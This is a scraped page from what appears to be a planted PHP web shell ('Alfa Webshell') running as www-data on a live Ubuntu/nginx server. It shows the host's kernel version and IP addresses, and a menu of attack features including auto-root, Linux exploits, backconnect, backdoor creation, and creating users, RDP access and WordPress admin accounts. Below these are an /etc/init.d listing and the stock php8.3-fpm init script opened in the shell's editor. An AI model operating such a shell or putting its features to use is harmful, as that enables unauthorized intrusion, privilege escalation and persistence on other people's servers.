Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apache-htcacheclean
2.43
KB
-rwxr-xr-x
apache2
7.95
KB
-rwxr-xr-x
apparmor
3.65
KB
-rwxr-xr-x
apport
2.22
KB
-rwxr-xr-x
auditd
3.54
KB
-rwxr-xr-x
clamav-freshclam
7.51
KB
-rwxr-xr-x
console-setup.sh
1.21
KB
-rwxr-xr-x
cron
3.03
KB
-rwxr-xr-x
cryptdisks
937
B
-rwxr-xr-x
cryptdisks-early
896
B
-rwxr-xr-x
dbus
3.08
KB
-rwxr-xr-x
grub-common
985
B
-rwxr-xr-x
iperf3
1.36
KB
-rwxr-xr-x
iscsid
1.48
KB
-rwxr-xr-x
keyboard-setup.sh
1.45
KB
-rwxr-xr-x
kmod
2
KB
-rwxr-xr-x
mariadb
8.26
KB
-rwxr-xr-x
nginx
4.47
KB
-rwxr-xr-x
open-iscsi
2.41
KB
-rwxr-xr-x
open-vm-tools
1.8
KB
-rwxr-xr-x
pcp
2.92
KB
-rwxr-xr-x
php8.3-fpm
4.19
KB
-rwxr-xr-x
plymouth
1.35
KB
-rwxr-xr-x
plymouth-log
760
B
-rwxr-xr-x
pmcd
16.98
KB
-rwxr-xr-x
pmie
2.49
KB
-rwxr-xr-x
pmlogger
2.56
KB
-rwxr-xr-x
pmproxy
2.5
KB
-rwxr-xr-x
procps
959
B
-rwxr-xr-x
rsync
4.31
KB
-rwxr-xr-x
screen-cleanup
1.19
KB
-rwxr-xr-x
ssh
3.96
KB
-rwxr-xr-x
sysstat
1.54
KB
-rwxr-xr-x
ufw
2.04
KB
-rwxr-xr-x
unattended-upgrades
1.36
KB
-rwxr-xr-x
uuidd
1.28
KB
-rwxr-xr-x
vnstat
1.55
KB
-rwxr-xr-x
vsftpd
2.02
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php8.3-fpm
#!/bin/sh ### BEGIN INIT INFO # Provides: php8.3-fpm # Required-Start: $remote_fs $network # Required-Stop: $remote_fs $network # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: starts php8.3-fpm # Description: Starts The PHP FastCGI Process Manager Daemon ### END INIT INFO # Author: Ondrej Sury <ondrej@debian.org> PATH=/sbin:/usr/sbin:/bin:/usr/bin DESC="PHP 8.3 FastCGI Process Manager" NAME=php-fpm8.3 CONFFILE=/etc/php/8.3/fpm/php-fpm.conf DAEMON=/usr/sbin/$NAME DAEMON_ARGS="--daemonize --fpm-config $CONFFILE" CONF_PIDFILE=$(sed -n 's/^pid[ =]*//p' $CONFFILE) PIDFILE=${CONF_PIDFILE:-/run/php/php8.3-fpm.pid} TIMEOUT=30 SCRIPTNAME=/etc/init.d/$NAME # Exit if the package is not installed [ -x "$DAEMON" ] || exit 0 # Read configuration variable file if it is present [ -r /etc/default/$NAME ] && . /etc/default/$NAME # Load the VERBOSE setting and other rcS variables . /lib/init/vars.sh # Define LSB log_* functions. # Depend on lsb-base (>= 3.0-6) to ensure that this file is present. . /lib/lsb/init-functions # # Function that starts the daemon/service # do_start() { # Return # 0 if daemon has been started # 1 if daemon was already running # 2 if daemon could not be started start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \ || return 1 start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON -- \ $DAEMON_ARGS 2>/dev/null \ || return 2 # Add code here, if necessary, that waits for the process to be ready # to handle requests from services started subsequently which depend # on this one. As a last resort, sleep for some time. } # # Function that stops the daemon/service # do_stop() { # Return # 0 if daemon has been stopped # 1 if daemon was already stopped # 2 if daemon could not be stopped # other if a failure occurred start-stop-daemon --stop --quiet --retry=QUIT/$TIMEOUT/TERM/5/KILL/5 --pidfile $PIDFILE --name $NAME RETVAL="$?" [ "$RETVAL" = 2 ] && return 2 # Wait for children to finish too if this is a daemon that forks # and if the daemon is only ever run from this initscript. # If the above conditions are not satisfied then add some other code # that waits for the process to drop all resources that could be # needed by services started subsequently. A last resort is to # sleep for some time. start-stop-daemon --stop --quiet --oknodo --retry=0/30/TERM/5/KILL/5 --exec $DAEMON [ "$?" = 2 ] && return 2 # Many daemons don't delete their pidfiles when they exit. rm -f $PIDFILE return "$RETVAL" } # # Function that sends a SIGHUP to the daemon/service # do_reload() { # # If the daemon can reload its configuration without # restarting (for example, when it is sent a SIGHUP), # then implement that here. # start-stop-daemon --stop --signal USR2 --quiet --pidfile $PIDFILE --name $NAME return 0 } case "$1" in start) [ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC" "$NAME" systemd-tmpfiles --remove --create /usr/lib/tmpfiles.d/php8.3-fpm.conf case "$?" in 0) do_start case "$?" in 0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;; 2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; 1) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; stop) [ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME" do_stop case "$?" in 0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;; 2) [ "$VERBOSE" != no ] && log_end_msg 1 ;; esac ;; status) status_of_proc "$DAEMON" "$NAME" && exit 0 || exit $? ;; reload|force-reload) log_daemon_msg "Reloading $DESC" "$NAME" do_reload log_end_msg $? ;; reopen-logs) log_daemon_msg "Reopening $DESC logs" $NAME if start-stop-daemon --stop --signal USR1 --oknodo --quiet \ --pidfile $PIDFILE --exec $DAEMON then log_end_msg 0 else log_end_msg 1 fi ;; restart) log_daemon_msg "Restarting $DESC" "$NAME" do_stop case "$?" in 0|1) do_start case "$?" in 0) log_end_msg 0 ;; 1) log_end_msg 1 ;; # Old process is still running *) log_end_msg 1 ;; # Failed to start esac ;; *) # Failed to stop log_end_msg 1 ;; esac ;; *) echo "Usage: $SCRIPTNAME {start|stop|status|restart|reload|force-reload}" >&2 exit 1 ;; esac :
Close